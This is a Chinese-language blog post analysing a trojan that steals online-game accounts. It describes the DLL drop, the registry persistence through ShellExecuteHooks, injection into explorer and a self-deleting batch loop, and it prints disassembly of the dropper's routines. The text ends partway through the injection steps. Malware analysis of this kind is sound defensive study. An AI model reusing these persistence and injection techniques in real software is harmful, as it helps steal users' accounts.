一个网游盗号木马的分析来源: 发布时间:星期三, 2009年9月2日 浏览:2次 评论:0
【作者声明】: 今年7月份学会汇编9月份买了加密和解密3正式开始学软件Software安全这段时间走过来后感慨良多!在新年来临的前发表篇文章纪念下 ^-^
本文针对病毒源文件和生成DLL分别作了分析 病毒有以下行为: (1)病毒运行后释放rijxckin.dll到C:\WINDOWS\system32\ (2) 生成注册表项 1.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\ JXQY\Url 2.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C- 698745210353}\InprocServe r32\"", 3.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C- 698745210353}\InprocServer32\ThreadingModel, 4.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explo rer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353},内容 为"rijxckin.dll" (3)把C:\WINDOWS\system32\rijxzkin.dll文件注入到explorer进程 (4)在临时文件夹里创建bat文件,用来删除病毒自身文件,bat文件内容如下(其 中C:\a.exe为病毒文件路径): @echo off :Loop del "C:\a.exe" exist "C\a.exe" goto Loop (1)病毒运行后释放rijxckin.dll到C:\WINDOWS\system32\ 第步:查找C:\WINDOWS\system32\路径,看有没有rijxckin.dll文件 Unpacker:004026A8 FindFile proc near ; CODE XREF: FindBatFileAndDel+8 p Unpacker:004026A8 ; FindBatFileAndDel+24 p ... Unpacker:004026A8 Unpacker:004026A8 var_144 = ptr -144h Unpacker:004026A8 Unpacker:004026A8 push ebx Unpacker:004026A9 add esp, 0FFFFFEC0h Unpacker:004026AF xor ebx, ebx Unpacker:004026B1 push esp ; lpFindFileData Unpacker:004026B2 push eax ; lpFileName Unpacker:004026B3 call FindFirstFileA Unpacker:004026B8 cmp eax, 0FFFFFFFFh Unpacker:004026BB jz loc_4026C5 Unpacker:004026BD test [esp+144h+var_144], 10h Unpacker:004026C1 jnz loc_4026C5 Unpacker:004026C3 mov bl, 1 Unpacker:004026C5 Unpacker:004026C5 loc_4026C5: ; CODE XREF: FindFile+13 j Unpacker:004026C5 ; FindFile+19 j Unpacker:004026C5 push eax ; hFindFile Unpacker:004026C6 call FindClose Unpacker:004026CB mov eax, ebx Unpacker:004026CD add esp, 140h Unpacker:004026D3 pop ebx Unpacker:004026D4 retn Unpacker:004026D4 FindFile endp 第 2步:没有话就从自身文件里释放出rijxckin.dll到C:\WINDOWS\system32\ Unpacker:00402E2C push esi ; lpFileName Unpacker:00402E2D mov ecx, off dword_402F00 ;ASCII "ICO" Unpacker:00402E32 mov edx, off aMain ; "MAIN" Unpacker:00402E37 xor eax, eax ; hModule Unpacker:00402E39 call CreateDllFile { Unpacker:00402AAC CreateDllFile proc near ; CODE XREF: sub_402E18+21 p Unpacker:00402AAC Unpacker:00402AAC NumberOfBytesWritten= dword ptr -4 Unpacker:00402AAC lpFileName = dword ptr 8 Unpacker:00402AAC Unpacker:00402AAC push ebp Unpacker:00402AAD mov ebp, esp Unpacker:00402AAF push ecx Unpacker:00402AB0 push ebx Unpacker:00402AB1 push esi Unpacker:00402AB2 push edi Unpacker:00402AB3 mov ebx, eax Unpacker:00402AB5 push ecx ; lpType Unpacker:00402AB6 push edx ; lpName Unpacker:00402AB7 push ebx ; hModule Unpacker:00402AB8 call FindResourceA Unpacker:00402ABD mov esi, eax Unpacker:00402ABF push esi ; hResInfo Unpacker:00402AC0 push ebx ; hModule Unpacker:00402AC1 call SizeofResource Unpacker:00402AC6 mov edi, eax ;eax=5e00 Unpacker:00402AC8 push esi ; hResInfo Unpacker:00402AC9 push ebx ; hModule Unpacker:00402ACA call LoadResource Unpacker:00402ACF push eax ; hResData Unpacker:00402AD0 call LockResource Unpacker:00402AD5 mov esi, eax Unpacker:00402AD7 push 0 ; hTemplateFile Unpacker:00402AD9 push 80h ; dwFlagsAndAttributes Unpacker:00402ADE push 2 ; dwCreationDisposition Unpacker:00402AE0 push 0 ; lpSecurityAttributes Unpacker:00402AE2 push 2 ; dwShareMode Unpacker:00402AE4 push 40000000h ; dwDesiredAccess Unpacker:00402AE9 mov eax, [ebp+lpFileName] Unpacker:00402AEC push eax ;lpFileName="C:\WINDOWS\system32\rijxzkin.dll" Unpacker:00402AED call CreateFileA Unpacker:00402AF2 mov ebx, eax Unpacker:00402AF4 push 0 ; lpOverlapped Unpacker:00402AF6 lea eax, [ebp+NumberOfBytesWritten] Unpacker:00402AF9 push eax ; lpNumberOfBytesWritten Unpacker:00402AFA push edi ; nNumberOfBytesToWrite 文件长度5E00 Unpacker:00402AFB push esi ; lpBuffer ASCII "MZP" Unpacker:00402AFC push ebx ; hFile Unpacker:00402AFD call WriteFile_0 Unpacker:00402B02 push ebx ; hObject Unpacker:00402B03 call CloseHandle Unpacker:00402B08 mov al, 1 Unpacker:00402B0A pop edi Unpacker:00402B0B pop esi Unpacker:00402B0C pop ebx Unpacker:00402B0D pop ecx Unpacker:00402B0E pop ebp Unpacker:00402B0F retn 4 Unpacker:00402B0F CreateDllFile endp } (2) 生成注册表项 1.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\ JXQY\Url ,内容为00(200h) 2.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C- 698745210353}\InprocServer32\"", 3.HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C- 698745210353}\InprocServer32\ThreadingModel, 4.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explo rer\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353},内容 为"rijxckin.dll" 增加注册表是: Unpacker:00402B14 AddRegKey proc near ; CODE XREF: sub_402C1C+7F p Unpacker:00402B14 ; sub_402C1C+D0 p ... Unpacker:00402B14 Unpacker:00402B14 hKey = dword ptr -4 Unpacker:00402B14 cbData = dword ptr 8 Unpacker:00402B14 lpData = dword ptr 0Ch Unpacker:00402B14 dwType = dword ptr 10h Unpacker:00402B14 Unpacker:00402B14 push ebp Unpacker:00402B15 mov ebp, esp Unpacker:00402B17 push ecx Unpacker:00402B18 push ebx Unpacker:00402B19 mov ebx, ecx Unpacker:00402B1B lea ecx, [ebp+hKey] Unpacker:00402B1E push ecx ; phkResult Unpacker:00402B1F push edx ; lpSubKey Unpacker:00402B20 push eax ; hKey Unpacker:00402B21 call RegCreateKeyA Unpacker:00402B26 mov eax, [ebp+cbData] Unpacker:00402B29 push eax ; cbData Unpacker:00402B2A mov eax, [ebp+lpData] Unpacker:00402B2D push eax ; lpData Unpacker:00402B2E mov eax, [ebp+dwType] Unpacker:00402B31 push eax ; dwType Unpacker:00402B32 push 0 ; Reserved Unpacker:00402B34 push ebx ; lpValueName Unpacker:00402B35 mov eax, [ebp+hKey] Unpacker:00402B38 push eax ; hKey Unpacker:00402B39 call RegSetValueExA Unpacker:00402B3E mov ebx, eax Unpacker:00402B40 mov eax, [ebp+hKey] Unpacker:00402B43 push eax ; hKey Unpacker:00402B44 call RegCloseKey_0 Unpacker:00402B49 mov eax, ebx Unpacker:00402B4B pop ebx Unpacker:00402B4C pop ecx Unpacker:00402B4D pop ebp Unpacker:00402B4E retn 0Ch Unpacker:00402B4E AddRegKey endp 在4个地方分别了这个创建键值: 00402A34创建 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Game\JX QY\Url ,内容为00(200h) 00402C9B创建HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C- 698745210353}\InprocServer32\"", 00402CEC创建HKEY_CLASSES_ROOT\CLSID\{35FD6584-698F-BCD2-602C- 698745210353}\InprocServer32\ThreadingModel, 00402D4C创建 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explore r\ShellExecuteHooks\{35FD6584-698F-BCD2-602C-698745210353},内容 为"rijxckin.dll" (3)把C:\WINDOWS\system32\rijxzkin.dll文件注入到explorer进程 共分 3步完成 第步: 获取explorer.exe句柄 Unpacker:00402510 GetExplorerHandle proc near ; CODE XREF: sub_402DD8+8 p Unpacker:00402510 Unpacker:00402510 var_138 = dword ptr -138h Unpacker:00402510 var_114 = ptr -114h Unpacker:00402510 Unpacker:00402510 push ebx Unpacker:00402511 push esi Unpacker:00402512 push edi Unpacker:00402513 push ebp Unpacker:00402514 add esp, 0FFFFFED8h Unpacker:0040251A mov ebx, edx Unpacker:0040251C mov esi, eax Unpacker:0040251E xor edi, edi Unpacker:00402520 xor edx, edx Unpacker:00402522 mov eax, 2 Unpacker:00402527 call CreateModuleSnapshot ; 创建快照 Unpacker:0040252C mov ebp, eax Unpacker:0040252E mov [esp+138h+var_138], 128h Unpacker:00402535 mov edx, esp Unpacker:00402537 mov eax, ebp Unpacker:00402539 call FindProcess ; BDS 2005-2006 and Delphi6-7 Visual Component Library Unpacker:0040253E jmp loc_402560 Unpacker:00402540 ; ----------------------------------------------------------------- ---------- Unpacker:00402540 Unpacker:00402540 loc_402540: ; CODE XREF: GetExplorerHandle+58 j Unpacker:00402540 lea eax, [esp+138h+var_114] Unpacker:00402544 Unpacker:00402544 loc_402544: ; CODE XREF: Unpacker:loc_40BA44 j Unpacker:00402544 ; DATA XREF: Unpacker:0040BA3F o Unpacker:00402544 push eax Unpacker:00402545 push esi Unpacker:00402546 call lstrcmpi ;比较线程名字是 否"explorer",不是话通过循环继续获取比较 Unpacker:0040254B test eax, eax Unpacker:0040254D jnz loc_402557 Unpacker:0040254F mov edi, [esp+140h+var_138] Unpacker:00402553 test bl, bl Unpacker:00402555 jz loc_40256A Unpacker:00402557 Unpacker:00402557 loc_402557: ; CODE XREF: GetExplorerHandle+3D j Unpacker:00402557 mov edx, esp Unpacker:00402559 mov eax, ebp Unpacker:0040255B call FindProcessNext ; 获取快照中下个 进程名字 Unpacker:00402560 Unpacker:00402560 loc_402560: ; CODE XREF: GetExplorerHandle+2E j Unpacker:00402560 cmp eax, 1 Unpacker:00402563 sbb eax, eax Unpacker:00402565 inc eax Unpacker:00402566 cmp al, 1 Unpacker:00402568 jz loc_402540 Unpacker:0040256A Unpacker:0040256A loc_40256A: ; CODE XREF: GetExplorerHandle+45 j Unpacker:0040256A push ebp ; hObject Unpacker:0040256B call CloseHandle Unpacker:00402570 mov eax, edi Unpacker:00402572 add esp, 128h Unpacker:00402578 pop ebp Unpacker:00402579 pop edi Unpacker:0040257A pop esi Unpacker:0040257B pop ebx Unpacker:0040257B GetExplorerHandle endp ; 第 2步: 检查explorer进程中是否已有rijxzkin.dll文件 Unpacker:00402580 FindDllModule proc near ; CODE XREF: sub_402DD8+18 p Unpacker:00402580 Unpacker:00402580 var_234 = dword ptr -234h Unpacker:00402580 var_220 = dword ptr -220h Unpacker:00402580 var_214 = ptr -214h Unpacker:00402580 var_114 = ptr -114h Unpacker:00402580 Unpacker:00402580 push ebx Unpacker:00402581 push esi Unpacker:00402582 push edi Unpacker:00402583 push ebp Unpacker:00402584 add esp, 0FFFFFDDCh Unpacker:0040258A mov edi, ecx Unpacker:0040258C mov ebx, edx Unpacker:0040258E mov esi, eax Unpacker:00402590 xor ebp, ebp Unpacker:00402592 test edi, edi Unpacker:00402594 jz loc_4025A2 Unpacker:00402596 mov edx, 104h Unpacker:0040259B mov eax, edi Unpacker:0040259D call @Windows@ZeroMemory$qqrpvui ; Windows::ZeroMemory(void *,u) Unpacker:004025A2 Unpacker:004025A2 loc_4025A2: ; CODE XREF: FindDllModule+14 j Unpacker:004025A2 mov edx, esi Unpacker:004025A4 mov eax, 8 Unpacker:004025A9 call CreateModuleSnapshot ; 创建快照 Unpacker:004025AE mov esi, eax Unpacker:004025B0 mov [esp+234h+var_234], 224h Unpacker:004025B0 ; CODE XREF: Unpacker:loc_40BAB4 j Unpacker:004025B7 mov edx, esp Unpacker:004025B9 mov eax, esi Unpacker:004025BB call FindModuleFirst ; 查找explorer进程中是 否已有"rijxzkin.dll" Unpacker:004025C0 cmp eax, 1 Unpacker:004025C3 sbb eax, eax Unpacker:004025C5 inc eax Unpacker:004025C6 cmp al, 1 Unpacker:004025C8 jnz loc_402608 Unpacker:004025CA Unpacker:004025CA loc_4025CA: ; CODE XREF: FindDllModule+86 j Unpacker:004025CA test ebx, ebx Unpacker:004025CC jz loc_4025DD Unpacker:004025CE lea eax, [esp+234h+var_214] Unpacker:004025D2 push eax Unpacker:004025D3 push ebx Unpacker:004025D4 call lstrcmpi Unpacker:004025D9 test eax, eax Unpacker:004025DB jnz loc_4025F5 Unpacker:004025DD Unpacker:004025DD loc_4025DD: ; CODE XREF: FindDllModule+4C j Unpacker:004025DD test edi, edi Unpacker:004025DF jz loc_4025EF Unpacker:004025E1 lea eax, [esp+234h+var_114] Unpacker:004025E8 push eax Unpacker:004025E9 push edi Unpacker:004025EA call lstrcpy Unpacker:004025EF Unpacker:004025EF loc_4025EF: ; CODE XREF: FindDllModule+5F j Unpacker:004025EF mov ebp, [esp+234h+var_220] Unpacker:004025F3 jmp loc_402608 Unpacker:004025F5 ; ----------------------------------------------------------------- ---------- Unpacker:004025F5 Unpacker:004025F5 loc_4025F5: ; CODE XREF: FindDllModule+5B j Unpacker:004025F5 mov edx, esp Unpacker:004025F7 mov eax, esi Unpacker:004025F9 call FindModuleNext ; 继续查找explorer进程 中是否已加载"rijxzkin.dll" Unpacker:004025FE cmp eax, 1 Unpacker:00402601 sbb eax, eax Unpacker:00402603 inc eax Unpacker:00402604 cmp al, 1 Unpacker:00402606 jz loc_4025CA Unpacker:00402608 Unpacker:00402608 loc_402608: ; CODE XREF: FindDllModule+48 j Unpacker:00402608 ; FindDllModule+73 j Unpacker:00402608 push esi ; hObject Unpacker:00402609 call CloseHandle Unpacker:0040260E mov eax, ebp Unpacker:00402610 add esp, 224h Unpacker:00402616 pop ebp Unpacker:00402617 pop edi Unpacker:00402618 pop esi Unpacker:00402619 pop ebx Unpacker:0040261A retn Unpacker:0040261A FindDllModule endp 0
相关文章读者评论发表评论 |